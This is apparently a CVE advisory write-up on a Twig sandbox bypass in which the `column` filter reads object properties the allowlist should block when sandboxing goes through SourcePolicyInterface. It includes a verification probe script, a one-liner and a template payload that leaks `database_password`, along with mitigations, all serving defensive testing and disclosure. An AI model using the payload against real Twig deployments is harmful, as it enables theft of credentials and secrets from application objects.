Twig (PHP templating engine), Sandbox Property Allowlist Bypass via SourcePolicyInterface, CVE-2026-48808 (Medium) -DC-Jun2026-755


How CVE-2026-48808 Works

CVE-2026-48808 is a follow-up to the incomplete fix for CVE-2026-46635 / GHSA-vcc8-phrv-43wj. Unlike the original issue, this residual flaw affects only sandboxing that is enabled per template through `SourcePolicyInterface`; the regular global sandbox mode is not affected.
The vulnerability is in `CoreExtension::column()`, the implementation of the `column` filter. The method receives the active sandbox state through the `needs_is_sandboxed` filter option as a boolean `$isSandboxed`. When it performs the per-element property reads, however, it routes them through `SandboxExtension::checkPropertyAllowed()` without forwarding the current `Source`.
Internally, `SandboxExtension::checkPropertyAllowed()` re-evaluates `isSandboxed($source)`. With `$source` null, the decision already made by the `SourcePolicyInterface` is lost and the method short-circuits to "not sandboxed", so the property allowlist (`SecurityPolicy::$allowedProperties`) is never consulted.
A template author whose sandbox is gated by a `SourcePolicyInterface`, and whose policy lists `column` in `allowedFilters`, can therefore read any public or magic (`__get`/`__isset`) property of any object reachable in the render context, regardless of `SecurityPolicy::$allowedProperties`.
Direct attribute access to the same property (`obj.database_password`) is blocked, and the same `column` payload is blocked under global sandbox mode, which makes this a policy-enforcement gap rather than a misconfiguration.
The fix, released in Twig 3.14.2 and 3.16.0, stops `CoreExtension::column()` from going through the `SandboxExtension` wrapper for the property check and calls the security policy directly: the per-source decision is already captured in the `$isSandboxed` boolean computed at the call site, so the property allowlist is enforced consistently under both global and source-policy sandboxing.
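To make the three cases contrasted above observable on a real install, here is an added probe script (example code written for this write-up; it is not Twig's own code and not part of the original advisory). It assumes a Composer install of twig/twig in the working directory; the `User` class and the `SandboxEverything` source policy are hypothetical stand-ins for an application's context object and policy. It renders a direct property access and the `column` payload under both global sandbox mode and a `SourcePolicyInterface`, with an empty property allowlist, and reports which reads are blocked.

```php
<?php
// Added probe (not Twig code, not from the advisory). Assumes `composer require twig/twig`
// has been run in this directory. User and SandboxEverything are hypothetical.
declare(strict_types=1);

require __DIR__ . '/vendor/autoload.php';

use Twig\Environment;
use Twig\Extension\SandboxExtension;
use Twig\Loader\ArrayLoader;
use Twig\Sandbox\SecurityError;
use Twig\Sandbox\SecurityPolicy;
use Twig\Sandbox\SourcePolicyInterface;
use Twig\Source;

// Hypothetical context object; the property is what the sandbox is supposed to protect.
final class User
{
    public string $database_password = 's3cr3t';
}

// Hypothetical per-source policy that sandboxes every template it is asked about.
final class SandboxEverything implements SourcePolicyInterface
{
    public function enableSandbox(Source $source): bool
    {
        return true;
    }
}

// Policy with an empty property allowlist: no property read should ever succeed.
// `column` is allowed (the precondition of the bypass); `join` only prints the result.
function policy(): SecurityPolicy
{
    return new SecurityPolicy(
        [],                 // allowedTags
        ['column', 'join'], // allowedFilters
        [],                 // allowedMethods
        [],                 // allowedProperties
        []                  // allowedFunctions
    );
}

// Constructed templates: a direct attribute read and the column-filter payload.
const TEMPLATES = [
    'direct' => '{{ users[0].database_password }}',
    'column' => '{{ users|column("database_password")|join(",") }}',
];

// Render both templates under one sandbox configuration. A fresh Environment per
// configuration matters: compiled templates are cached per Environment instance.
function probe(SandboxExtension $sandbox): array
{
    $twig = new Environment(new ArrayLoader(TEMPLATES));
    $twig->addExtension($sandbox);

    $results = [];
    foreach (array_keys(TEMPLATES) as $name) {
        try {
            $results[$name] = 'LEAKED: ' . $twig->render($name, ['users' => [new User()]]);
        } catch (SecurityError $e) {
            // Filter, tag and property rejections all derive from SecurityError.
            $results[$name] = 'blocked: ' . get_class($e);
        }
    }
    return $results;
}

$modes = [
    // Global mode: second argument true sandboxes every template.
    'global sandbox'        => new SandboxExtension(policy(), true),
    // Source-policy mode: the sandbox decision is delegated per Source.
    'SourcePolicyInterface' => new SandboxExtension(policy(), false, new SandboxEverything()),
];

foreach ($modes as $label => $sandbox) {
    foreach (probe($sandbox) as $template => $outcome) {
        printf("%-22s %-7s %s\n", $label, $template, $outcome);
    }
}
```

Run it with `php probe.php`. On a vulnerable version the advisory's description predicts exactly one LEAKED line, `SourcePolicyInterface column`, and three lines blocked with `Twig\Sandbox\SecurityNotAllowedPropertyError`; on 3.14.2 / 3.16.0 or later all four lines are blocked. The same script doubles as a regression check after upgrading, and replacing `['column', 'join']` with `['join']` in `policy()` shows the interim mitigation of dropping `column` from `allowedFilters`: the payload then fails at compile time with `SecurityNotAllowedFilterError` before any property is read.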

DailyCVE Form:

Platform: Twig (PHP)
Version: < 3.14.2, < 3.16.0 (fixed in 3.14.2 and 3.16.0)
Vulnerability: Sandbox property allowlist bypass
Severity: Medium
Date: 2026-05-27

Prediction: 2026-05-27

What Undercode Say:

Check Twig Version

composer show twig/twig | grep versions

Verify Vulnerability (Test with a Sandbox Policy that blocks all properties)

php -r '
require "vendor/autoload.php";
// Constructed context object holding the property the sandbox should protect.
class User { public $database_password = "s3cr3t"; }
// Source policy that sandboxes every template (the affected mode).
class SandboxEverything implements Twig\Sandbox\SourcePolicyInterface {
    public function enableSandbox(Twig\Source $source): bool { return true; }
}
// Empty property allowlist; column must be an allowed filter, join only prints the result.
$policy = new Twig\Sandbox\SecurityPolicy([], ["column", "join"], [], [], []);
$twig = new Twig\Environment(new Twig\Loader\ArrayLoader(["test" => "{{ users|column(\"database_password\")|join(\",\") }}"]));
$twig->addExtension(new Twig\Extension\SandboxExtension($policy, false, new SandboxEverything()));
echo $twig->render("test", ["users" => [new User()]]), PHP_EOL;
'

This command attempts to read the `database_password` property under a sandbox policy whose property allowlist is empty, so every property read should be rejected. On an unpatched install it prints `s3cr3t`; on a patched install it throws `Twig\Sandbox\SecurityNotAllowedPropertyError`. Two details matter for the test to be meaningful: `column` must be in `allowedFilters` (otherwise the sandbox rejects the filter at compile time, before the property check is ever reached), and the sandbox must be enabled through a `SourcePolicyInterface`. Passing `true` as the second `SandboxExtension` argument instead selects global mode, where the same payload is blocked, and passing `false` without a source policy does not sandbox the template at all.

Vulnerable Template Example (Sandbox enabled)

{% set objects = [user, admin] %}
{% set leaked = objects|column('database_password') %}

This template reads the `database_password` property of every object in the array through the `column` filter, bypassing the sandbox's property allowlist. For it to run at all, the policy must allow the `column` filter and the `set` tag; a direct `{{ user.database_password }}` in the same template would still be rejected.

Exploit:

An attacker who can control or influence a Twig template, and whose template is sandboxed through a `SourcePolicyInterface`, can use the `column` filter to read sensitive data. Because the `Source` is not forwarded during the property check, the sandbox wrongly treats the call as "not sandboxed" and returns any public or magic property of any object in the render context, regardless of `SecurityPolicy::$allowedProperties`. The preconditions are that `column` is in the policy's `allowedFilters` and that the target objects are reachable from the context inside an array (`column` iterates over an array of objects).

Protection:

  • Upgrade Twig to 3.14.2 or 3.16.0 (or later). These releases carry the fix that makes `CoreExtension::column()` call the security policy directly with the pre-computed `$isSandboxed` boolean.
  • If upgrading is not immediately possible, remove `column` from `allowedFilters` in every `SecurityPolicy` used together with a `SourcePolicyInterface`; the sandbox then rejects the filter at compile time, before the property check is reached.
  • Alternatively, enable the sandbox globally (`new SandboxExtension($policy, true)`) instead of through a `SourcePolicyInterface` until the patch is applied. The same payload is blocked in global mode, but this sandboxes every template, not only those the source policy would have selected.

Impact:

  • Information Disclosure: An attacker can read sensitive data from objects in the render context, such as database credentials, API keys or internal configuration values, held in public properties or exposed through the `__get`/`__isset` magic methods, which is what `column` reads. Getter methods are not reached by this path, so the exposure is limited to property-style data.
  • Bypass of Security Controls: The `SecurityPolicy::$allowedProperties` list is completely ignored, rendering the primary sandboxing mechanism for property access ineffective.
  • Limited Scope: This vulnerability only affects environments using `SourcePolicyInterface` for sandboxing. Global sandbox mode and direct attribute access are not vulnerable to this specific bypass.


Sources:

Reported By: github.com